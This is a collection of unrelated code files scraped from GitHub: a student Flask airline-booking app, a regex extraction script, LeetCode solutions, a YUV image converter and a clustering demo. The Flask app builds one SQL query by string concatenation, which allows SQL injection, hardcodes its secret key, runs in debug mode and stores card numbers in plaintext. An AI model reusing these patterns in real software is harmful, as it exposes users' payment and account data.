cursor.execute(query, (name, city))\r\n conn.commit()\r\n except pymysql.IntegrityError:\r\n return render_template('add_airport.html', error = 'Airport already exists!')\r\n cursor.close()\r\n return redirect(url_for('add_airport'))\r\n\r\n@app.route('/view_rating')\r\ndef view_rating():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n cursor = conn.cursor();\r\n query = '''SELECT flight.flight_no, flight.dep_datetime, AVG(rate) as rating\r\n FROM flight NATURAL JOIN take\r\n WHERE airline = %s\r\n GROUP BY flight.flight_no, flight.dep_datetime;'''\r\n cursor.execute(query, (airline))\r\n message = cursor.fetchall()\r\n cursor.close()\r\n if message:\r\n return render_template('view_rating.html', data = message)\r\n else:\r\n return render_template('view_rating.html', error = 'flight does not exist or comment does not exist')\r\n@app.route('/viewFlightRating', methods=['POST'])\r\ndef viewFlightRating():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n flight_no = request.form['flight_no']\r\n dept_date = request.form['dept_date']\r\n cursor = conn.cursor();\r\n query = '''SELECT name, rate, comment\r\n FROM take NATURAL JOIN customer\r\n WHERE airline = %s AND (flight_no = %s) AND (DATE(dep_datetime) = %s);'''\r\n cursor.execute(query, (airline, flight_no, dept_date))\r\n message = cursor.fetchall()\r\n cursor.close()\r\n return render_template('view_rating.html', message = message)\r\n\r\n@app.route('/view_frequent_cust')\r\ndef view_frequent_cust():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n cursor = conn.cursor();\r\n query = '''SELECT take.email AS email, name, COUNT(*) AS flight_count\r\n FROM take NATURAL JOIN customer\r\n WHERE airline = %s AND YEAR(dep_datetime) = YEAR(CURDATE())\r\n GROUP BY email\r\n ORDER BY COUNT(*) DESC\r\n LIMIT 1;'''\r\n cursor.execute(query, (airline))\r\n data = cursor.fetchone()\r\n cursor.close()\r\n print(data)\r\n if data:\r\n return render_template('view_frequent_cust.html', data = data)\r\n else:\r\n return render_template('view_frequent_cust.html', error = 'no flights were taken this year')\r\n\r\n@app.route('/view_cust_flights')\r\ndef view_cust_flights():\r\n return render_template('view_cust_flights.html')\r\n\r\n@app.route('/viewCustFlightsAction', methods=['POST'])\r\ndef viewCustFlightsAction():\r\n email = request.form['email']\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n cursor = conn.cursor();\r\n query = '''SELECT dep_airport, arr_airport, flight.dep_datetime as dep_datetime, flight.flight_no as flight_no, ticket_id\r\n FROM take NATURAL JOIN customer NATURAL JOIN flight\r\n WHERE (airline = %s) AND (YEAR(dep_datetime) = YEAR(CURDATE()) - 1) AND (customer.email = %s);'''\r\n cursor.execute(query, (airline, email))\r\n data = cursor.fetchall()\r\n cursor.close()\r\n print(data)\r\n if data:\r\n return render_template('view_cust_flights.html', data = data)\r\n else:\r\n return render_template('view_cust_flights.html', error = 'no flights were taken')\r\n\r\n@app.route('/view_sales')\r\ndef view_sales():\r\n return render_template('view_sales.html')\r\n\r\n@app.route('/viewSalesAction', methods=['POST'])\r\ndef viewSalesAction():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n start_date = request.form['start_date']\r\n end_date = request.form['end_date']\r\n cursor = conn.cursor();\r\n query = '''SELECT YEAR(sold_datetime) AS year, MONTH(sold_datetime) AS month, COUNT(*) as sales\r\n FROM ticket NATURAL JOIN take\r\n WHERE (sold_datetime BETWEEN %s AND %s) AND (airline = %s)\r\n GROUP BY YEAR(sold_datetime), MONTH(sold_datetime);'''\r\n cursor.execute(query, (start_date, end_date, airline))\r\n data = cursor.fetchall()\r\n cursor.close()\r\n print(data)\r\n labels = []\r\n values = []\r\n for each in data:\r\n labels.append(str(each['year'])+'-'+str(each['month']))\r\n values.append(each['sales'])\r\n return render_template('bar_chart.html', title='Monthly Sales', max=10, labels=labels, values=values)\r\n# graphing courtesy of Ruan Bekker https://blog.ruanbekker.com/blog/2017/12/14/graphing-pretty-charts-with-python-flask-and-chartjs/\r\n\r\n@app.route('/view_quarter')\r\ndef view_quarter():\r\n return render_template('view_quarter.html')\r\n\r\n@app.route('/viewQuarterAction', methods=['POST'])\r\ndef viewQuarterAction():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n start_date = request.form['start_date']\r\n end_date = request.form['end_date']\r\n cursor = conn.cursor();\r\n # query = '''SELECT YEAR(sold_datetime) AS year, QUARTER(sold_datetime) AS quarter, SUM(price) as revenue\r\n # FROM ticket NATURAL JOIN take\r\n # WHERE (sold_datetime BETWEEN %s AND %s) AND (airline = %s)\r\n # GROUP BY YEAR(sold_datetime), QUARTER(sold_datetime);'''\r\n query = '''SELECT YEAR(sold_datetime) AS year, QUARTER(sold_datetime) AS quarter, SUM(price) as revenue\r\n FROM ticket\r\n WHERE (sold_datetime BETWEEN %s AND %s)\r\n GROUP BY YEAR(sold_datetime), QUARTER(sold_datetime);'''\r\n # cursor.execute(query, (start_date, end_date, airline))\r\n cursor.execute(query, (start_date, end_date))\r\n data = cursor.fetchall()\r\n cursor.close()\r\n print(data)\r\n labels = []\r\n values = []\r\n colors = [\"#F7464A\", \"#46BFBD\", \"#FDB45C\", \"#FEDCBA\"]\r\n for each in data:\r\n labels.append(str(each['year'])+ ' Q' +str(each['quarter']))\r\n values.append(each['revenue'])\r\n return render_template('pie_chart.html', title='Quarterly Sales', max=100000, set=zip(values, labels, colors))\r\n# graphing courtesy of Ruan Bekker https://blog.ruanbekker.com/blog/2017/12/14/graphing-pretty-charts-with-python-flask-and-chartjs/\r\n\r\n@app.route('/customerHome',methods=['POST','GET'])\r\ndef customerHome():\r\n email = session['customer']['email']\r\n name = session['customer']['name']\r\n cursor = conn.cursor()\r\n view_by = \"dep_datetime\"\r\n qfuture = 'SELECT airline, flight_no, dep_datetime, dep_airport, arr_airport, status FROM take NATURAL JOIN flight WHERE email = %s AND dep_datetime > NOW() ORDER BY %s ASC'\r\n cursor.execute(qfuture, (email, view_by))\r\n future_flight = cursor.fetchall()\r\n qpast = 'SELECT airline, flight_no, dep_datetime, dep_airport, arr_airport,rate,comment FROM take NATURAL JOIN flight WHERE email = %s AND arr_datetime < NOW() ORDER BY %s DESC'\r\n cursor.execute(qpast,(email,view_by))\r\n past_flight = cursor.fetchall()\r\n cursor.execute('SELECT*FROM airport')\r\n city = cursor.fetchall()\r\n #add cities in flight informations\r\n for i in range(len(future_flight)):\r\n for n in city:\r\n if n['name']== future_flight[i]['dep_airport']:\r\n future_flight[i]['dep_city'] = n['city']\r\n if n['name']== future_flight[i]['arr_airport']:\r\n future_flight[i]['arr_city'] = n['city']\r\n for i in range(len(past_flight)):\r\n for n in city:\r\n if n['name']== past_flight[i]['dep_airport']:\r\n past_flight[i]['dep_city'] = n['city']\r\n if n['name']== past_flight[i]['arr_airport']:\r\n past_flight[i]['arr_city'] = n['city']\r\n return render_template('customer_home.html', name=name, email=email,future_flight=future_flight,past_flight=past_flight)\r\n@app.route('/viewMyFlight',methods=['GET','POST'])\r\ndef view_my_flight():\r\n email = session['customer']['email']\r\n name = session['customer']['name']\r\n cursor = conn.cursor()\r\n view_by = request.form['view_by']\r\n qfuture = 'SELECT airline, flight_no, dep_datetime, dep_airport, arr_airport, status FROM take NATURAL JOIN flight WHERE email = %s AND dep_datetime > NOW() ORDER BY %s ASC'\r\n cursor.execute(qfuture, (email, view_by))\r\n future_flight = cursor.fetchall()\r\n qpast = 'SELECT airline, flight_no, dep_datetime, dep_airport, arr_airport,rate,comment FROM take NATURAL JOIN flight WHERE email = %s AND arr_datetime < NOW() ORDER BY %s DESC'\r\n cursor.execute(qpast,(email,view_by))\r\n past_flight = cursor.fetchall()\r\n cursor.execute('SELECT*FROM airport')\r\n city = cursor.fetchall()\r\n #add cities in flight informations\r\n for i in range(len(future_flight)):\r\n for n in city:\r\n if n['name']== future_flight[i]['dep_airport']:\r\n future_flight[i]['dep_city'] = n['city']\r\n if n['name']== future_flight[i]['arr_airport']:\r\n future_flight[i]['arr_city'] = n['city']\r\n for i in range(len(past_flight)):\r\n for n in city:\r\n if n['name']== past_flight[i]['dep_airport']:\r\n past_flight[i]['dep_city'] = n['city']\r\n if n['name']== past_flight[i]['arr_airport']:\r\n past_flight[i]['arr_city'] = n['city']\r\n return render_template('customer_home.html', name=name, email=email,future_flight=future_flight,past_flight=past_flight)\r\n\r\n@app.route('/addComment',methods=['GET','POST'])\r\ndef add_comment():\r\n cursor = conn.cursor()\r\n email = session['customer']['email']\r\n rate, comment = request.form[\"rate\"], request.form[\"comment\"]\r\n flight_info = (email,request.form[\"cr_airline\"],request.form[\"cr_flight_no\"],request.form[\"cr_dep_datetime\"])\r\n cursor.execute(\"SELECT*FROM take WHERE email=%s AND airline=%s AND flight_no=%s AND dep_datetime=%s\",flight_info)\r\n if cursor.fetchall() is not None and rate in ('1','2','3','4','5'):\r\n #store query information from html form in this tuple\r\n cr_flight = (request.form[\"rate\"],request.form[\"comment\"],email,request.form[\"cr_airline\"],request.form[\"cr_flight_no\"],request.form[\"cr_dep_datetime\"])\r\n cursor.execute('UPDATE take SET rate=%s, comment=%s WHERE email=%s AND airline=%s AND flight_no=%s AND dep_datetime=%s',cr_flight)\r\n conn.commit()\r\n cursor.close()\r\n message = 'Comment Placed'\r\n else:\r\n message = 'Incorrect Format or Information'\r\n return render_template('customer_home.html', message=message)\r\n@app.route('/staff_home',methods=['GET','POST'])\r\ndef staff_home():\r\n cursor=conn.cursor()\r\n airline = session[\"staff\"][\"airline\"]\r\n qflight = 'SELECT * FROM flight WHERE airline=%s AND dep_datetime>NOW()'\r\n flight = cursor.execute(qflight,(airline))\r\n cursor.close()\r\n return render_template('staff_home.html')\r\n\r\n\r\n@app.route('/customerSearch',methods=['GET','POST'])\r\ndef customerSearch():\r\n return render_template('customer_search.html')\r\n\r\n@app.route('/customerSearchResult', methods=['GET', 'POST'])\r\ndef customerSearchResult():\r\n dept_city_airport = request.form['dept_city']\r\n dest_city_airport = request.form['dest_city']\r\n dept_date = request.form['dept_date']\r\n ret_date = request.form['ret_date']\r\n cursor = conn.cursor()\r\n if ret_date == '':\r\n query = '''SELECT flight_no, airline, dep_datetime, arr_datetime,\r\n dep_airport, arr_airport, a1.city AS dep_city, a2.city AS arr_city, base_price\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n INNER JOIN airport a2 on flight.arr_airport = a2.name\r\n WHERE (dep_airport = %s OR a1.city = %s) AND (arr_airport = %s OR a2.city = %s)\r\n AND DATE(dep_datetime) = %s;'''\r\n cursor.execute(query, (dept_city_airport, dept_city_airport, dest_city_airport, dest_city_airport, dept_date))\r\n else:\r\n query = '''SELECT flight_no, airline, dep_datetime, arr_datetime,\r\n dep_airport, arr_airport, a1.city AS dep_city, a2.city AS arr_city, base_price\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n INNER JOIN airport a2 on flight.arr_airport = a2.name\r\n WHERE ((dep_airport = %s OR a1.city = %s) AND (arr_airport = %s OR a2.city = %s)\r\n AND DATE(dep_datetime) = %s) OR ((dep_airport = %s OR a1.city = %s) AND (arr_airport = %s OR a2.city = %s)\r\n AND DATE(dep_datetime) = %s);'''\r\n cursor.execute(query, (\r\n dept_city_airport, dept_city_airport, dest_city_airport, dest_city_airport, dept_date, dest_city_airport,\r\n dest_city_airport, dept_city_airport, dept_city_airport, ret_date))\r\n flight = cursor.fetchall()\r\n cursor.close()\r\n if data:\r\n return render_template('flight_search.html', flight=flight)\r\n else:\r\n error = 'no flight available, please search again'\r\n return render_template('flight_search.html', error=error)\r\n\r\n@app.route('/purchase', methods=['GET', 'POST'])\r\ndef purchase():\r\n return render_template('purchase.html')\r\n@app.route('/purchaseResult', methods=['GET', 'POST'])\r\ndef purchaseResult():\r\n cursor = conn.cursor()\r\n message = None\r\n while message==None:\r\n airline, flight_no, dep_datetime = request.form['airline'],request.form['flight_no'],request.form['dep_datetime']\r\n qflight = 'SELECT*FROM flight NATURAL JOIN airplane WHERE dep_datetime>NOW() AND airline= %s AND flight_no=%s AND dep_datetime=%s'\r\n cursor.execute(qflight, (airline, flight_no, dep_datetime))\r\n flight = cursor.fetchone()\r\n if flight is None:\r\n message = 'Flight Not Availible, Please Try Again'\r\n break\r\n base_price, seat_sold,capacity = int(flight['base_price']), int(flight['seat_sold']), int(flight['capacity'])\r\n if seat_sold >= capacity:\r\n message = 'Flight capacity is full'\r\n break\r\n elif seat_sold > 0.7*capacity:\r\n price = round(1.2*base_price,2)\r\n else:\r\n price = round(base_price,2)\r\n card_no, card_type, name, exp_date = request.form['card_no'], request.form['card_type'], request.form['name'], request.form['exp_date']\r\n sold_datetime = datetime.now()\r\n seat_sold += 1\r\n cursor.execute('SELECT ticket_id FROM ticket')\r\n new_ticket = str(random.randint(1000000000,9999999999))\r\n tickets = []\r\n for i in cursor.fetchall():\r\n tickets.append(i['ticket_id'])\r\n while new_ticket in tickets:\r\n new_ticket = str(random.randint(1000000000, 9999999999))\r\n add_ticket = 'INSERT INTO ticket values(%s,%s,%s,%s,%s,%s,%s)'\r\n cursor.execute(add_ticket,(new_ticket,price,sold_datetime,card_type,card_no,name,exp_date))\r\n add_take = 'INSERT INTO take values(%s,%s,%s,%s,%s,%s,%s)'\r\n cursor.execute(add_take,(session['customer']['email'],flight_no,airline,dep_datetime,0,'',new_ticket))\r\n add_passenger = 'UPDATE flight SET seat_sold=%s WHERE airline=%s AND flight_no=%s AND dep_datetime=%s'\r\n cursor.execute(add_passenger,(seat_sold,airline,flight_no,dep_datetime))\r\n conn.commit()\r\n cursor.close()\r\n message = 'Thank you, your total is:' + str(price)\r\n break\r\n #Create a new unique ticket id\r\n return render_template(\"purchase.html\",message=message)\r\n\r\n@app.route('/customerSpending',methods=['GET','POST'])\r\ndef customerSpendinng():\r\n cursor = conn.cursor()\r\n try:\r\n email = session['customer']['email']\r\n except:\r\n return render_template('index.html',message='please login to view your spending')\r\n query1 = \"SELECT DATE_FORMAT(sold_datetime, '%Y-%m') AS month , SUM(price) AS total FROM ticket NATURAL JOIN take WHERE email = '\"\r\n query2 = \"' GROUP BY month ORDER BY month DESC;\"\r\n query = query1 + str(email) + query2\r\n cursor.execute(query)\r\n spending = cursor.fetchall()\r\n return render_template('customer_spending.html',spending=spending)\r\n\r\n@app.route('/logoutStaff')\r\ndef logoutStaff():\r\n\tsession.pop('staff')\r\n\treturn render_template('/logout.html', logged_out = 'Logged Out!')\r\n@app.route('/logoutCustomer')\r\ndef logoutCustomer():\r\n\tsession.pop('customer')\r\n\treturn render_template('/logout.html', logged_out = 'Logged Out!')\r\n@app.route('/action_unauthorized')\r\ndef action_unauthorized():\r\n return render_template('action_unauthorized.html')\r\n\r\n\r\napp.secret_key = 'some key that you will never guess'\r\n#Run the app on localhost port 5000\r\n#debug = True -> you don't have to restart flask\r\n#for changes to go through, TURN OFF FOR PRODUCTION\r\nif __name__ == \"__main__\":\r\n\tapp.run('127.0.0.1', 5000, debug = True)\r\n","repo_name":"Ultrablocker/Databases_Project_Summer_2020","sub_path":"init1.py","file_name":"init1.py","file_ext":"py","file_size_in_byte":38356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"42608611212","text":"import re # importing re module to deal with regular expressions\nimport sys # gives access to System-specific parameters and functions\n\n# defining command line input arguments to be entered by the user\n\nf = open(sys.argv[1], 'r') # opening the input file in read mode\n\n# defining list variables to store the results\ncurr_res = []\nmail_res = []\nphno_res = []\nukpostcode_res = []\nurl_res = []\nuszip_res = []\ndate_res = []\n\n# defining flag variables\n\nmail_flag = False\ncurr_flag = False\nphno_flag = False\nurl_flag = False\nukpostcode_flag = False\nuszip_flag = False\ndate_flag = False\n\n# email regular expresssion\nmail_regex = '[a-zA-Z0-9][a-zA-Z0-9!#$%&\\'*+/=.?^_`{|}~-]*@(?:[a-zA-Z](?:[a-zA-Z0-9-]*)?\\.)+[a-zA-Z0-9](?:[a-zA-Z0-9-]*[a-zA-Z])?'\n\n# currency regular expresssion\ncurr_regex = '(?:\\$|can\\$|C\\$|€|USD|CAD|EUR|ATS|BEF|DEM|EEK|ESP|FIM|FRF|GRD|IEP|ITL|LUF|NLG|PTE|can)[\\s\\S]?\\d{1,3}(?:,\\d{3})*(?:\\.\\d{1,3})?(?=\\s)'\n\n# UK Postal Code regular expresssion\nukpostcode_regex = '[A-Z]{1,2}[0-9R][0-9A-Z]? [0-9][ABD-HJLNP-UW-Z]{2}'\n\n# US phone number regular expresssion\nphno_regex = '[+]?[1\\s-]*[\\(-]?[0-9]{3}[-\\)]?[\\s-]?[0-9]{3}[\\s-]?[0-9]{4}(?=\\s)'\n\n# url regular expresssion\nurl_regex = 'http[s]?://(?:[a-zA-Z0-9$-_@.&+!*\\(\\),]|(?:%[0-9a-zA-Z]))+(?=\\s)'\n\n# US Zip code regular expression\nuszip_regex = '\\s?[0-9]{5}(?:-[0-9]{4})?$'\n\n# Date format: dd/mm/yyyy regular expression\ndate_regex1 = '\\s?(?:0?[1-9]|[1,2][0-9]|3[0-1])(?:/)(?:0?[1-9]|1[0-2])(?:/)(?:\\d{4})'\n\n# Date format: mm/dd/yyyy regular expression\ndate_regex2 ='\\s?(?:0?[1-9]|1[0-2])(?:/)(?:0?[1-9]|[1,2][0-9]|3[0-1])(?:/)(?:\\d{4})'\n\n# Date format: 1st, mon/month yyyy regular expression\ndate_regex3 = '\\s?(?:0?[1-9]|[1,2][0-9]|3[0-1])(?:nd|rd|th|st)?(?:[\\s|,|]?\\s?)(?:[Jj]an(?:uary)?|[Ff]eb(?:ruary)?|[Mm]ar(?:ch)?|[Aa]pr(?:il)?|[Mm]ay|[Jj]une|[Jj]uly|[Aa]ug(?:ust)?|[Ss]ept(?:ember)?|[Oo]ct(?:ober)?|[Nn]ov(?:ember)?|[Dd]ec(?:ember)?)\\s\\d{4}'\n\n# Date format: mon/month, 1, yyyy regular expression\ndate_regex4 = '\\s?(?:[Jj]an(?:uary)?|[Ff]eb(?:ruary)?|[Mm]ar(?:ch)?|[Aa]pr(?:il)?|[Mm]ay|[Jj]une|[Jj]uly|[Aa]ug(?:ust)?|[Ss]ept(?:ember)?|[Oo]ct(?:ober)?|[Nn]ov(?:ember)?|[Dd]ec(?:ember)?)(?:[\\s|,]?\\s?)(?:0?[1-9]|[1,2][0-9]|3[0-1])(?:[\\s|,]?\\s?)\\s\\d{4}'\n\n\nchoice = ['-e', '-u', '-p', '-c', '-k', '-z', '-d']\ncount = len(sys.argv)\n\nfor i in range(2, count):\n\n\tif (sys.argv[i]) not in choice:\n\t\tprint(\"\\nUsage: [optional arguments]\\n\\nFrist Argument\\t\", sys.argv[0], \"python script name with .py extension to be entered\\n\\nSecond Argument\", sys.argv[1], \"\\ttext input file with .txt extension to be entered as 2nd argument \\n\\n[optional arguments]\\n-e\\t--this option displays all the valid Email occurrences from the input file\\n-u\\t--this option displays all the valid Url occurrences from the input file\\n-c\\t--this option displays only EURO,Canada and US Currency format occurrences from the input file\\n-p\\t--this option displays only valid US Phone number occurrences from the input file\\n-k\\t--this option displays only valid UK Postal code occurrences from the input file\\n-z\\t--this option displays only valid US ZIP code occurrences from the input file\\n-d\\t--this option displays the following date format occurrences from the input file\\n\\t dd/mm/yyyy, mm/dd/yyyy, 1st mon/month yyyy, mon/month, 1, yyyy\")\n\t\tsys.exit()\n\n\telif sys.argv[i] == '-e':\n\t\tmail_flag = True\n\n\telif sys.argv[i] == '-c':\n\t\tcurr_flag = True\n\n\telif sys.argv[i] == '-u':\n\t\turl_flag = True\n\n\telif sys.argv[i] == '-p':\n\t\tphno_flag = True\n\n\telif sys.argv[i] == '-k':\n\t\tukpostcode_flag = True\n\n\telif sys.argv[i] == '-z':\n\t\tuszip_flag = True\n\n\telif sys.argv[i] == '-d':\n\t\tdate_flag = True\n\nfor line in f.readlines():\n\tif curr_flag is True:\n\t\tcurr = re.findall(curr_regex, line)\n\t\tif len(curr) > 0:\n\t\t\tcurr_res.extend(curr)\n\n\tif mail_flag is True:\n\t\tmail = re.findall(mail_regex, line)\n\t\tif len(mail) > 0:\n\t\t\tmail_res.extend(mail)\n\n\tif phno_flag is True:\n\t\tph = re.findall(phno_regex, line)\n\t\tif len(ph) > 0:\n\t\t\tphno_res.extend(ph)\n\n\tif ukpostcode_flag is True:\n\t\tukpostcode = re.findall(ukpostcode_regex, line)\n\t\tif len(ukpostcode) > 0:\n\t\t\tukpostcode_res.extend(ukpostcode)\n\n\tif url_flag is True:\n\t\turl = re.findall(url_regex, line)\n\t\tif len(url) > 0:\n\t\t\turl_res.extend(url)\n\n\tif uszip_flag is True:\n\t\tuszip = re.findall(uszip_regex, line)\n\t\tif len(uszip) > 0:\n\t\t\tuszip_res.extend(uszip)\n\n\tif date_flag is True:\n\t\tdate1 = re.findall(date_regex1, line)\n\t\tdate2 = re.findall(date_regex2, line)\n\t\tdate3 = re.findall(date_regex3, line)\n\t\tdate4 = re.findall(date_regex4, line)\n\t\tif len(date1) > 0:\n\t\t\tdate_res.extend(date1)\n\t\tif len(date2) > 0:\n\t\t\tdate_res.extend(date2)\n\t\tif len(date3) > 0:\n\t\t\tdate_res.extend(date3)\n\t\tif len(date4) > 0:\n\t\t\tdate_res.extend(date4)\n\n# printing the results\nfor i in range(2, count):\n\n\tif '-e' in sys.argv[i]:\n\t\tprint(\"\\nValid Email occurrences in the input file are:\\n\", mail_res)\n\n\tif '-c' in sys.argv[i]:\n\t\tprint(\"\\nRecognized currency (USD/CAD/EURO) occurrences in the input file are:\\n\", curr_res)\n\n\tif '-p' in sys.argv[i]:\n\t\tprint(\"\\nValid US Phone number occurrences in the input file are:\\n\", phno_res)\n\n\tif '-u' in sys.argv[i]:\n\t\tprint(\"\\nValid URL occurrences in the input file are:\\n\", url_res)\n\n\tif '-k' in sys.argv[i]:\n\t\tprint(\"\\nValid UK Postal code occurrences in the input file are:\\n\", ukpostcode_res)\n\n\tif '-z' in sys.argv[i]:\n\t\tprint(\"\\n Valid US ZIP code occurrences in the input file are:\\n\", uszip_res)\n\n\tif '-d' in sys.argv[i]:\n\t\tprint(\"\\n Recognized date formats (dd/mm/yyyy, mm/dd/yyyy, 1st,mon/month yyyy, mon/month 1, yyyy) in the input file are:\\n\", date_res)\n\n\n","repo_name":"ibm-ecm/content-analyzer-regex","sub_path":"python/Regex.py","file_name":"Regex.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"37062024827","text":"class Solution:\n def removeDuplicates(self, s: str, k: int) -> str:\n size = len(s)\n if k>size or not k: return s\n stack=[]\n for c in s:\n if stack and stack[-1][0]==c:\n stack[-1][1]+=1\n if stack[-1][1]==k:stack.pop()\n continue\n stack.append([c,1])\n res=''\n for value, count in stack:\n res+=value*count\n return res","repo_name":"simon7426/Competitive-Programming-AC-Submissions","sub_path":"Leetcode/python3/1209.remove-all-adjacent-duplicates-in-string-ii.medium.py","file_name":"1209.remove-all-adjacent-duplicates-in-string-ii.medium.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"32987282766","text":"\nimport cv2\nimport numpy as np\n# import Image\nscreenLevels = 255.0\ndef yuv_import(filename,dims,numfrm,startfrm):\n fp=open(filename,'rb')\n blk_size = int(np.prod(dims) *3/2)\n #fp.seek(blk_size*startfrm,0)\n Y=[]\n U=[]\n V=[]\n print(dims[0])\n print(dims[1])\n d00=dims[0]//2\n d01=dims[1]//2\n print(d00)\n print(d01)\n Yt=np.zeros((dims[0],dims[1]),np.uint8,'C')\n Ut=np.zeros((d00,d01),np.uint8,'C')\n Vt=np.zeros((d00,d01),np.uint8,'C')\n # yuv=zeros((dims[0]*3//2,dims[1]))\n for i in range(numfrm):\n for m in range(dims[0]):\n for n in range(dims[1]):\n #print m,n\n num=fp.read(1)\n Yt[m,n]=ord(num)\n for m in range(d00):\n for n in range(d01):\n Ut[m,n]=ord(fp.read(1))\n for m in range(d00):\n for n in range(d01):\n Vt[m,n]=ord(fp.read(1))\n Y=Y+[Yt]\n U=U+[Ut]\n V=V+[Vt]\n fp.close()\n return (Y,U,V)\nif __name__ == '__main__':\n width=480\n height=272\n data=yuv_import('E:\\\\project\\\\2020_Project\\\\partiledetect\\\\YUV\\\\cuc_view_480x272.yuv',(height,width),1,0)\n rgb=np.zeros((height,width,3))\n YY=data[0][0]\n cv2.imshow(\"show\",YY)\n\n b=np.fromfile('E:\\\\project\\\\2020_Project\\\\partiledetect\\\\YUV\\\\cuc_view_480x272.yuv',np.uint8,height*width*3//2)\n c=b.reshape((height*3//2,width))\n rgb=cv2.cvtColor(c,cv2.COLOR_YUV2BGR_I420,rgb)\n cv2.imshow(\"rgb\",rgb)\n cv2.imwrite(\"rgb.jpg\",rgb)\n cv2.waitKey(0)","repo_name":"x1ng-z/partiledetect","sub_path":"YUV/yuvprocess.py","file_name":"yuvprocess.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"32253706315","text":"import sys\nsys.stdin=open('ladder.txt')\n\ndy=[0,0,1] #좌 우 하\ndx=[-1,1,0]\n\ndef dfs(y,x):\n global step\n global flag\n if flag==1:\n return\n visited[y][x]=1\n for z in range(3):\n testy=y+dy[z]\n testx=x+dx[z]\n if -1 None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n O(m+n) space and O(mn) time\n \"\"\"\n row = set()\n column = set()\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n row.add(i)\n column.add(j)\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if i in row or j in column:\n matrix[i][j] = 0\n\n def setZeroes(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n O(1) space O(mn) time, is_col is for matrix[0][0] to see whether it is both column and row or just row\n \"\"\"\n is_col = False\n R = len(matrix)\n C = len(matrix[0])\n for i in range(R):\n if matrix[i][0] == 0:\n is_col = True\n for j in range(1, C):\n if matrix[i][j] == 0:\n matrix[0][j] = 0\n matrix[i][0] = 0\n for i in range(1,R):\n for j in range(1,C):\n if matrix[0][j] == 0 or matrix[i][0] == 0:\n matrix[i][j] = 0\n if matrix[0][0] == 0:\n for j in range(C):\n matrix[0][j] = 0 \n if is_col:\n for i in range(R):\n matrix[i][0] = 0","repo_name":"Eustaceyi/Leetcode","sub_path":"73. Set Matrix Zeroes.py","file_name":"73. Set Matrix Zeroes.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9248847902","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 14 13:22:17 2017\n\n@author: KAI\n\"\"\"\n\nfrom sklearn.cluster import DBSCAN,KMeans\nfrom sklearn.datasets import make_blobs\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D \n\nX,y=make_blobs(n_samples=1000,n_features=3,centers=4)\nX=preprocessing.minmax_scale(X)\n\nclf=DBSCAN(eps=0.1,min_samples=20,metric=\"euclidean\")\ny_pred=clf.fit_predict(X)\n\ny_pred_km=KMeans(n_clusters=4).fit_predict(X)\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.set_title(\"DBSCAN\")\nax.scatter(X[:,0],X[:,1],X[:,2],c=y_pred,s=20,cmap='RdYlBu')\n\nfig2=plt.figure()\nax2 = fig2.add_subplot(111, 